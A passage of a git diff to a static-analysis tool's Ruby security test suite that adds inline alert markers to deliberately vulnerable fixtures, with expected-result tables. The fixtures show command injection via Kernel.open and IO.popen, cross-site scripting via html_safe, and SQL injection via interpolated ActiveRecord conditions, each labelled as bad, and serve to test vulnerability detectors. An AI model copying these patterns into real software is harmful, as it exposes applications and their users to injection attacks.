| call to params | user-provided value | -| KernelOpen.rb:9:16:9:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:9:16:9:19 | file | This call to IO.foreach depends on a $@. Consider replacing it with File.foreach. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:10:18:10:21 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:10:18:10:21 | file | This call to IO.readlines depends on a $@. Consider replacing it with File.readlines. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:11:14:11:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:11:14:11:17 | file | This call to URI.open depends on a $@. Consider replacing it with URI().open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:13:13:13:31 | call to join | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:13:13:13:31 | call to join | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:26:10:26:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:26:10:26:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.qlref b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.qlref index aea01648c788..b8b59265f26b 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.qlref +++ b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.qlref @@ -1 +1,2 @@ -queries/security/cwe-078/KernelOpen.ql \ No newline at end of file +query: queries/security/cwe-078/KernelOpen.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.rb b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.rb index 412e2c50ead8..c5e3707ef39f 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.rb +++ b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.rb @@ -1,16 +1,16 @@ class UsersController < ActionController::Base def create - file = params[:file] - open(file) # BAD - IO.read(file) # BAD - IO.write(file) # BAD - IO.binread(file) # BAD - IO.binwrite(file) # BAD - IO.foreach(file) # BAD - IO.readlines(file) # BAD - URI.open(file) # BAD + file = params[:file] # $ Source + open(file) # BAD # $ Alert + IO.read(file) # BAD # $ Alert + IO.write(file) # BAD # $ Alert + IO.binread(file) # BAD # $ Alert + IO.binwrite(file) # BAD # $ Alert + IO.foreach(file) # BAD # $ Alert + IO.readlines(file) # BAD # $ Alert + URI.open(file) # BAD # $ Alert - IO.read(File.join(file, "")) # BAD - file as first argument to File.join + IO.read(File.join(file, "")) # BAD - file as first argument to File.join # $ Alert IO.read(File.join("", file)) # GOOD - file path is sanitised by guard File.open(file).read # GOOD @@ -23,6 +23,6 @@ def create IO.read(file) # GOOD - file path is sanitised by guard end - open(file) # BAD - sanity check to verify that file was not mistakenly marked as sanitized + open(file) # BAD - sanity check to verify that file was not mistakenly marked as sanitized # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.qlref b/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.qlref index 0b23d9102b9a..7b559b55ae08 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.qlref +++ b/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.qlref @@ -1 +1,2 @@ -queries/security/cwe-078/NonConstantKernelOpen.ql \ No newline at end of file +query: queries/security/cwe-078/NonConstantKernelOpen.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.rb b/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.rb index 6b8294fa1112..50d99c9b7843 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.rb +++ b/ruby/ql/test/query-tests/security/cwe-078/NonConstantKernelOpen/NonConstantKernelOpen.rb @@ -4,18 +4,18 @@ class UsersController < ActionController::Base def create file = params[:file] - open(file) # BAD - IO.read(file) # BAD - IO.write(file) # BAD - IO.binread(file) # BAD - IO.binwrite(file) # BAD - IO.foreach(file) # BAD - IO.readlines(file) # BAD - URI.open(file) # BAD + open(file) # BAD # $ Alert + IO.read(file) # BAD # $ Alert + IO.write(file) # BAD # $ Alert + IO.binread(file) # BAD # $ Alert + IO.binwrite(file) # BAD # $ Alert + IO.foreach(file) # BAD # $ Alert + IO.readlines(file) # BAD # $ Alert + URI.open(file) # BAD # $ Alert File.open(file).read # GOOD - Kernel.open(file) # BAD + Kernel.open(file) # BAD # $ Alert File.open(file, "r") # GOOD @@ -25,7 +25,7 @@ def create Kernel.open("this is #{fine}") # GOOD - Kernel.open("#{this_is} bad") # BAD + Kernel.open("#{this_is} bad") # BAD # $ Alert open("| #{this_is_an_explicit_command} foo bar") # GOOD @@ -43,6 +43,6 @@ def create open.where(external: false) # GOOD - an open method is called withoout arguments - open(file) # BAD - sanity check to verify that file was not mistakenly marked as sanitized + open(file) # BAD - sanity check to verify that file was not mistakenly marked as sanitized # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected index 622777da09ea..adefbb03c645 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected @@ -1,3 +1,19 @@ +#select +| impl/sub/notImported.rb:3:14:3:28 | "cat #{...}" | impl/sub/notImported.rb:2:12:2:17 | target | impl/sub/notImported.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/notImported.rb:2:12:2:17 | target | library input | impl/sub/notImported.rb:3:5:3:34 | call to popen | shell command | +| impl/sub/other2.rb:3:14:3:28 | "cat #{...}" | impl/sub/other2.rb:2:12:2:17 | target | impl/sub/other2.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other2.rb:2:12:2:17 | target | library input | impl/sub/other2.rb:3:5:3:34 | call to popen | shell command | +| impl/sub/other.rb:3:14:3:28 | "cat #{...}" | impl/sub/other.rb:2:12:2:17 | target | impl/sub/other.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other.rb:2:12:2:17 | target | library input | impl/sub/other.rb:3:5:3:34 | call to popen | shell command | +| impl/unsafeShell.rb:3:14:3:28 | "cat #{...}" | impl/unsafeShell.rb:2:12:2:17 | target | impl/unsafeShell.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:2:12:2:17 | target | library input | impl/unsafeShell.rb:3:5:3:34 | call to popen | shell command | +| impl/unsafeShell.rb:7:14:7:33 | call to sprintf | impl/unsafeShell.rb:6:12:6:12 | x | impl/unsafeShell.rb:7:32:7:32 | x | This formatted string which depends on $@ is later used in a $@. | impl/unsafeShell.rb:6:12:6:12 | x | library input | impl/unsafeShell.rb:8:5:8:25 | call to popen | shell command | +| impl/unsafeShell.rb:20:14:20:42 | "which #{...}" | impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | impl/unsafeShell.rb:20:21:20:41 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | library input | impl/unsafeShell.rb:20:5:20:48 | call to popen | shell command | +| impl/unsafeShell.rb:26:14:26:31 | "cat #{...}" | impl/unsafeShell.rb:23:15:23:23 | file_path | impl/unsafeShell.rb:26:19:26:30 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:23:15:23:23 | file_path | library input | impl/unsafeShell.rb:26:5:26:37 | call to popen | shell command | +| impl/unsafeShell.rb:34:14:34:28 | "cat #{...}" | impl/unsafeShell.rb:33:12:33:17 | target | impl/unsafeShell.rb:34:19:34:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:33:12:33:17 | target | library input | impl/unsafeShell.rb:34:5:34:34 | call to popen | shell command | +| impl/unsafeShell.rb:38:14:38:23 | "cat #{...}" | impl/unsafeShell.rb:37:10:37:10 | x | impl/unsafeShell.rb:38:19:38:22 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:37:10:37:10 | x | library input | impl/unsafeShell.rb:38:5:38:29 | call to popen | shell command | +| impl/unsafeShell.rb:48:14:48:28 | "cat #{...}" | impl/unsafeShell.rb:47:16:47:21 | target | impl/unsafeShell.rb:48:19:48:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:47:16:47:21 | target | library input | impl/unsafeShell.rb:48:5:48:34 | call to popen | shell command | +| impl/unsafeShell.rb:52:14:52:24 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:52:14:52:14 | x | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:52:5:52:30 | call to popen | shell command | +| impl/unsafeShell.rb:54:14:54:40 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:54:29:54:29 | x | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:54:5:54:46 | call to popen | shell command | +| impl/unsafeShell.rb:58:14:58:23 | ... + ... | impl/unsafeShell.rb:57:21:57:21 | x | impl/unsafeShell.rb:58:23:58:23 | x | This string concatenation which depends on $@ is later used in a $@. | impl/unsafeShell.rb:57:21:57:21 | x | library input | impl/unsafeShell.rb:58:5:58:29 | call to popen | shell command | +| impl/unsafeShell.rb:64:14:64:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:64:14:64:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:64:5:64:32 | call to popen | shell command | +| impl/unsafeShell.rb:68:14:68:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:68:14:68:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:68:5:68:32 | call to popen | shell command | edges | impl/sub/notImported.rb:2:12:2:17 | target | impl/sub/notImported.rb:3:19:3:27 | #{...} | provenance | | | impl/sub/other2.rb:2:12:2:17 | target | impl/sub/other2.rb:3:19:3:27 | #{...} | provenance | | @@ -48,19 +64,3 @@ nodes | impl/unsafeShell.rb:64:14:64:16 | arr | semmle.label | arr | | impl/unsafeShell.rb:68:14:68:16 | arr | semmle.label | arr | subpaths -#select -| impl/sub/notImported.rb:3:14:3:28 | "cat #{...}" | impl/sub/notImported.rb:2:12:2:17 | target | impl/sub/notImported.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/notImported.rb:2:12:2:17 | target | library input | impl/sub/notImported.rb:3:5:3:34 | call to popen | shell command | -| impl/sub/other2.rb:3:14:3:28 | "cat #{...}" | impl/sub/other2.rb:2:12:2:17 | target | impl/sub/other2.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other2.rb:2:12:2:17 | target | library input | impl/sub/other2.rb:3:5:3:34 | call to popen | shell command | -| impl/sub/other.rb:3:14:3:28 | "cat #{...}" | impl/sub/other.rb:2:12:2:17 | target | impl/sub/other.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other.rb:2:12:2:17 | target | library input | impl/sub/other.rb:3:5:3:34 | call to popen | shell command | -| impl/unsafeShell.rb:3:14:3:28 | "cat #{...}" | impl/unsafeShell.rb:2:12:2:17 | target | impl/unsafeShell.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:2:12:2:17 | target | library input | impl/unsafeShell.rb:3:5:3:34 | call to popen | shell command | -| impl/unsafeShell.rb:7:14:7:33 | call to sprintf | impl/unsafeShell.rb:6:12:6:12 | x | impl/unsafeShell.rb:7:32:7:32 | x | This formatted string which depends on $@ is later used in a $@. | impl/unsafeShell.rb:6:12:6:12 | x | library input | impl/unsafeShell.rb:8:5:8:25 | call to popen | shell command | -| impl/unsafeShell.rb:20:14:20:42 | "which #{...}" | impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | impl/unsafeShell.rb:20:21:20:41 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | library input | impl/unsafeShell.rb:20:5:20:48 | call to popen | shell command | -| impl/unsafeShell.rb:26:14:26:31 | "cat #{...}" | impl/unsafeShell.rb:23:15:23:23 | file_path | impl/unsafeShell.rb:26:19:26:30 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:23:15:23:23 | file_path | library input | impl/unsafeShell.rb:26:5:26:37 | call to popen | shell command | -| impl/unsafeShell.rb:34:14:34:28 | "cat #{...}" | impl/unsafeShell.rb:33:12:33:17 | target | impl/unsafeShell.rb:34:19:34:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:33:12:33:17 | target | library input | impl/unsafeShell.rb:34:5:34:34 | call to popen | shell command | -| impl/unsafeShell.rb:38:14:38:23 | "cat #{...}" | impl/unsafeShell.rb:37:10:37:10 | x | impl/unsafeShell.rb:38:19:38:22 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:37:10:37:10 | x | library input | impl/unsafeShell.rb:38:5:38:29 | call to popen | shell command | -| impl/unsafeShell.rb:48:14:48:28 | "cat #{...}" | impl/unsafeShell.rb:47:16:47:21 | target | impl/unsafeShell.rb:48:19:48:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:47:16:47:21 | target | library input | impl/unsafeShell.rb:48:5:48:34 | call to popen | shell command | -| impl/unsafeShell.rb:52:14:52:24 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:52:14:52:14 | x | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:52:5:52:30 | call to popen | shell command | -| impl/unsafeShell.rb:54:14:54:40 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:54:29:54:29 | x | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:54:5:54:46 | call to popen | shell command | -| impl/unsafeShell.rb:58:14:58:23 | ... + ... | impl/unsafeShell.rb:57:21:57:21 | x | impl/unsafeShell.rb:58:23:58:23 | x | This string concatenation which depends on $@ is later used in a $@. | impl/unsafeShell.rb:57:21:57:21 | x | library input | impl/unsafeShell.rb:58:5:58:29 | call to popen | shell command | -| impl/unsafeShell.rb:64:14:64:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:64:14:64:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:64:5:64:32 | call to popen | shell command | -| impl/unsafeShell.rb:68:14:68:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:68:14:68:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:68:5:68:32 | call to popen | shell command | diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref index 99292da7663c..da9659dee163 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.qlref @@ -1 +1,2 @@ -queries/security/cwe-078/UnsafeShellCommandConstruction.ql \ No newline at end of file +query: queries/security/cwe-078/UnsafeShellCommandConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/notImported.rb b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/notImported.rb index 0a385f5f6bc0..0c7c1022da2c 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/notImported.rb +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/notImported.rb @@ -1,6 +1,6 @@ class Foobar - def foo1(target) - IO.popen("cat #{target}", "w") # NOT OK - everything assumed to be imported... + def foo1(target) # $ Source + IO.popen("cat #{target}", "w") # NOT OK - everything assumed to be imported... # $ Alert end end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other.rb b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other.rb index 22eaa13bcc02..87846abd662e 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other.rb +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other.rb @@ -1,6 +1,6 @@ class Foobar - def foo1(target) - IO.popen("cat #{target}", "w") # NOT OK + def foo1(target) # $ Source + IO.popen("cat #{target}", "w") # NOT OK # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other2.rb b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other2.rb index 007dae343ffe..7ad8ee69d3d2 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other2.rb +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/sub/other2.rb @@ -1,5 +1,5 @@ class Foobar - def foo1(target) - IO.popen("cat #{target}", "w") # NOT OK + def foo1(target) # $ Source + IO.popen("cat #{target}", "w") # NOT OK # $ Alert end end \ No newline at end of file diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/unsafeShell.rb b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/unsafeShell.rb index 487ca06ebd64..160e8c3f39c7 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/unsafeShell.rb +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/impl/unsafeShell.rb @@ -1,10 +1,10 @@ class Foobar - def foo1(target) - IO.popen("cat #{target}", "w") # NOT OK + def foo1(target) # $ Source + IO.popen("cat #{target}", "w") # NOT OK # $ Alert end - def foo2(x) - format = sprintf("cat %s", x) # NOT OK + def foo2(x) # $ Source + format = sprintf("cat %s", x) # NOT OK # $ Alert IO.popen(format, "w") end @@ -12,30 +12,30 @@ def fileRead1(path) File.read(path) # OK end - def my_exec(cmd, command, myCmd, myCommand, innocent_file_path) + def my_exec(cmd, command, myCmd, myCommand, innocent_file_path) # $ Source IO.popen("which #{cmd}", "w") # OK - the parameter is named `cmd`, so it's meant to be a command IO.popen("which #{command}", "w") # OK - the parameter is named `command`, so it's meant to be a command IO.popen("which #{myCmd}", "w") # OK - the parameter is named `myCmd`, so it's meant to be a command IO.popen("which #{myCommand}", "w") # OK - the parameter is named `myCommand`, so it's meant to be a command - IO.popen("which #{innocent_file_path}", "w") # NOT OK - the parameter is named `innocent_file_path`, so it's not meant to be a command + IO.popen("which #{innocent_file_path}", "w") # NOT OK - the parameter is named `innocent_file_path`, so it's not meant to be a command # $ Alert end - def escaped(file_path) + def escaped(file_path) # $ Source IO.popen("cat #{file_path.shellescape}", "w") # OK - the parameter is escaped - IO.popen("cat #{file_path}", "w") # NOT OK - the parameter is not escaped + IO.popen("cat #{file_path}", "w") # NOT OK - the parameter is not escaped # $ Alert end end require File.join(File.dirname(__FILE__), 'sub', 'other') class Foobar2 - def foo1(target) - IO.popen("cat #{target}", "w") # NOT OK + def foo1(target) # $ Source + IO.popen("cat #{target}", "w") # NOT OK # $ Alert end - def id(x) - IO.popen("cat #{x}", "w") # NOT OK - the parameter is not a constant. + def id(x) # $ Source + IO.popen("cat #{x}", "w") # NOT OK - the parameter is not a constant. # $ Alert return x end @@ -44,27 +44,27 @@ def thisIsSafe() end # class methods - def self.foo(target) - IO.popen("cat #{target}", "w") # NOT OK + def self.foo(target) # $ Source + IO.popen("cat #{target}", "w") # NOT OK # $ Alert end - def arrayJoin(x) - IO.popen(x.join(' '), "w") # NOT OK + def arrayJoin(x) # $ Source + IO.popen(x.join(' '), "w") # NOT OK # $ Alert - IO.popen(["foo", "bar", x].join(' '), "w") # NOT OK + IO.popen(["foo", "bar", x].join(' '), "w") # NOT OK # $ Alert end - def string_concat(x) - IO.popen("cat " + x, "w") # NOT OK + def string_concat(x) # $ Source + IO.popen("cat " + x, "w") # NOT OK # $ Alert end - def array_taint (x, y) + def array_taint (x, y) # $ Source arr = ["cat"] arr.push(x) - IO.popen(arr.join(' '), "w") # NOT OK + IO.popen(arr.join(' '), "w") # NOT OK # $ Alert arr2 = ["cat"] arr2 << y - IO.popen(arr.join(' '), "w") # NOT OK + IO.popen(arr.join(' '), "w") # NOT OK # $ Alert end end diff --git a/ruby/ql/test/query-tests/security/cwe-079/ReflectedXSS.qlref b/ruby/ql/test/query-tests/security/cwe-079/ReflectedXSS.qlref index af140959abb2..9dd84b480077 100644 --- a/ruby/ql/test/query-tests/security/cwe-079/ReflectedXSS.qlref +++ b/ruby/ql/test/query-tests/security/cwe-079/ReflectedXSS.qlref @@ -1 +1 @@ -queries/security/cwe-079/ReflectedXSS.ql +query: queries/security/cwe-079/ReflectedXSS.ql diff --git a/ruby/ql/test/query-tests/security/cwe-079/StoredXSS.qlref b/ruby/ql/test/query-tests/security/cwe-079/StoredXSS.qlref index 78de28cb2823..545a771648f9 100644 --- a/ruby/ql/test/query-tests/security/cwe-079/StoredXSS.qlref +++ b/ruby/ql/test/query-tests/security/cwe-079/StoredXSS.qlref @@ -1 +1 @@ -queries/security/cwe-079/StoredXSS.ql \ No newline at end of file +query: queries/security/cwe-079/StoredXSS.ql diff --git a/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected b/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected index 599f29e806c9..3b304c94586e 100644 --- a/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected @@ -1,3 +1,8 @@ +#select +| lib/unsafeHtml.rb:3:10:3:16 | #{...} | lib/unsafeHtml.rb:2:31:2:34 | name | lib/unsafeHtml.rb:3:10:3:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:2:31:2:34 | name | library input | lib/unsafeHtml.rb:3:5:3:22 | "

#{...}

" | cross-site scripting | +| lib/unsafeHtml.rb:11:13:11:19 | #{...} | lib/unsafeHtml.rb:9:27:9:30 | name | lib/unsafeHtml.rb:11:13:11:19 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:9:27:9:30 | name | library input | lib/unsafeHtml.rb:13:5:13:5 | h | cross-site scripting | +| lib/unsafeHtml.rb:17:28:17:31 | name | lib/unsafeHtml.rb:16:19:16:22 | name | lib/unsafeHtml.rb:17:28:17:31 | name | This string format which depends on $@ might later allow $@. | lib/unsafeHtml.rb:16:19:16:22 | name | library input | lib/unsafeHtml.rb:17:5:17:32 | call to sprintf | cross-site scripting | +| lib/unsafeHtml.rb:24:10:24:16 | #{...} | lib/unsafeHtml.rb:23:32:23:35 | name | lib/unsafeHtml.rb:24:10:24:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:23:32:23:35 | name | library input | lib/unsafeHtml.rb:24:5:24:22 | "

#{...}

" | cross-site scripting | edges | lib/unsafeHtml.rb:2:31:2:34 | name | lib/unsafeHtml.rb:3:10:3:16 | #{...} | provenance | | | lib/unsafeHtml.rb:9:27:9:30 | name | lib/unsafeHtml.rb:11:13:11:19 | #{...} | provenance | | @@ -13,8 +18,3 @@ nodes | lib/unsafeHtml.rb:23:32:23:35 | name | semmle.label | name | | lib/unsafeHtml.rb:24:10:24:16 | #{...} | semmle.label | #{...} | subpaths -#select -| lib/unsafeHtml.rb:3:10:3:16 | #{...} | lib/unsafeHtml.rb:2:31:2:34 | name | lib/unsafeHtml.rb:3:10:3:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:2:31:2:34 | name | library input | lib/unsafeHtml.rb:3:5:3:22 | "

#{...}

" | cross-site scripting | -| lib/unsafeHtml.rb:11:13:11:19 | #{...} | lib/unsafeHtml.rb:9:27:9:30 | name | lib/unsafeHtml.rb:11:13:11:19 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:9:27:9:30 | name | library input | lib/unsafeHtml.rb:13:5:13:5 | h | cross-site scripting | -| lib/unsafeHtml.rb:17:28:17:31 | name | lib/unsafeHtml.rb:16:19:16:22 | name | lib/unsafeHtml.rb:17:28:17:31 | name | This string format which depends on $@ might later allow $@. | lib/unsafeHtml.rb:16:19:16:22 | name | library input | lib/unsafeHtml.rb:17:5:17:32 | call to sprintf | cross-site scripting | -| lib/unsafeHtml.rb:24:10:24:16 | #{...} | lib/unsafeHtml.rb:23:32:23:35 | name | lib/unsafeHtml.rb:24:10:24:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:23:32:23:35 | name | library input | lib/unsafeHtml.rb:24:5:24:22 | "

#{...}

" | cross-site scripting | diff --git a/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.qlref b/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.qlref index ae814bcc35c1..501577ea1b9a 100644 --- a/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.qlref +++ b/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.qlref @@ -1 +1,2 @@ -queries/security/cwe-079/UnsafeHtmlConstruction.ql \ No newline at end of file +query: queries/security/cwe-079/UnsafeHtmlConstruction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/ruby/ql/test/query-tests/security/cwe-079/lib/unsafeHtml.rb b/ruby/ql/test/query-tests/security/cwe-079/lib/unsafeHtml.rb index 3f92d5938b1c..b2f36f375765 100644 --- a/ruby/ql/test/query-tests/security/cwe-079/lib/unsafeHtml.rb +++ b/ruby/ql/test/query-tests/security/cwe-079/lib/unsafeHtml.rb @@ -1,27 +1,27 @@ class Foobar - def create_user_description(name) - "

#{name}

".html_safe # NOT OK - the parameter is not escaped + def create_user_description(name) # $ Source[rb/html-constructed-from-input] + "

#{name}

".html_safe # NOT OK - the parameter is not escaped # $ Alert[rb/html-constructed-from-input] # escape "

#{ERB::Util.html_escape(name)}

".html_safe # OK - the parameter is escaped end - def string_like_literal name + def string_like_literal name # $ Source[rb/html-constructed-from-input] h = <<-HTML -

#{name}

+

#{name}

# $ Alert[rb/html-constructed-from-input] HTML h.html_safe # NOT OK - the parameter is not escaped end - def sprintf_use name - sprintf("

%s

", name).html_safe # NOT OK - the parameter is not escaped + def sprintf_use name # $ Source[rb/html-constructed-from-input] + sprintf("

%s

", name).html_safe # NOT OK - the parameter is not escaped # $ Alert[rb/html-constructed-from-input] # escape sprintf("

%s

", ERB::Util.html_escape(name)).html_safe # OK - the parameter is escaped end - def create_user_description2(name) - "

#{name}

".html_safe # NOT OK - the value is not necessarily HTML safe + def create_user_description2(name) # $ Source[rb/html-constructed-from-input] + "

#{name}

".html_safe # NOT OK - the value is not necessarily HTML safe # $ Alert[rb/html-constructed-from-input] if name.html_safe? "

#{name}

".html_safe # OK - value is marked as being HTML safe diff --git a/ruby/ql/test/query-tests/security/cwe-089/ActiveRecordInjection.rb b/ruby/ql/test/query-tests/security/cwe-089/ActiveRecordInjection.rb index 3a782e529d52..e811b51e8ae3 100644 --- a/ruby/ql/test/query-tests/security/cwe-089/ActiveRecordInjection.rb +++ b/ruby/ql/test/query-tests/security/cwe-089/ActiveRecordInjection.rb @@ -7,13 +7,13 @@ class User < ApplicationRecord def self.authenticate(name, pass) # BAD: possible untrusted input interpolated into SQL fragment - find(:first, :conditions => "name='#{name}' and pass='#{pass}'") + find(:first, :conditions => "name='#{name}' and pass='#{pass}'") # $ Alert # BAD: interpolation in array argument - find(:first, conditions: ["name='#{name}' and pass='#{pass}'"]) + find(:first, conditions: ["name='#{name}' and pass='#{pass}'"]) # $ Alert # GOOD: using SQL parameters find(:first, conditions: ["name = ? and pass = ?", name, pass]) # BAD: interpolation with flow - conds = "name=#{name}" + conds = "name=#{name}" # $ Alert find(:first, conditions: conds) end @@ -27,7 +27,7 @@ class Admin < User def self.delete_by(condition = nil) # BAD: `delete_by overrides an ActiveRecord method, but doesn't perform # any validation before passing its arguments on to another ActiveRecord method - destroy_by(condition) + 